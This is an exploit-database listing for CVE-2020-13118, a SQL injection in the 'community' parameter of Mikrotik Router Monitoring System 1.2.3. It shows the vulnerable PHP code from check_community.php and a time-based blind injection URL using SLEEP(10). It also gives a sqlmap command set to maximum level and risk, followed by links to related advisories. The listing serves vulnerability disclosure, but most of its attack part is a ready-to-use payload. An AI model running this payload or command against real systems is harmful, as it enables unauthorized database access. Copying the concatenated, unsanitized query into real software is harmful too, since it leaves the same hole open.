Lucene search
Jul10l1r41337DAY-ID-34438HistoryMay 19, 2020 - 12:00 a.m.
Mikrotik Router Monitoring System 1.2.3 - (community) SQL Injection Vulnerability
2020-05-1900:00:00
jul10l1r4
0day.today
198
0.028 Low
EPSS
Percentile
90.7%
Exploit for hardware platform in category web applications
# Exploit Title: Mikrotik Router Monitoring System 1.2.3 - 'community' SQL Injection
# Exploit Author: jul10l1r4 (Julio Lira)
# Vendor Homepage: https://mikrotik.com
# Software Link: https://mikrotik.com/download
# Version: <= 1.2.3
# Tested on: Debian 10 buster
# CVE: 2020-13118
Description: SQL Injection found in check_community.php:49
$community = $_GET['community'];
$_SESSION['community'] = $community;
$query = "SELECT name from router where `community`='
$community'";
PoC:
http://localhost/check_community.php?community=1' AND (SELECT 6941 FROM (SELECT(SLEEP(10)))Qaxg) AND 'sdHI'='sdHI
SQLmap using:
sqlmap -u 'http://localhost/check_community.php?community=1' --level=5 --risk=3
# 0day.today [2020-07-19] #Related
cve
cve
CVE-2020-13118
2020-05-16 20:15:11
packetstorm
packetstorm
Mikrotik Router Monitoring System 1.2.3 SQL Injection
2020-05-16 00:00:00
nvd
nvd
CVE-2020-13118
2020-05-16 20:15:11
cvelist
cvelist
CVE-2020-13118
2020-05-16 19:11:23
prion
prion
Sql injection
2020-05-16 20:15:00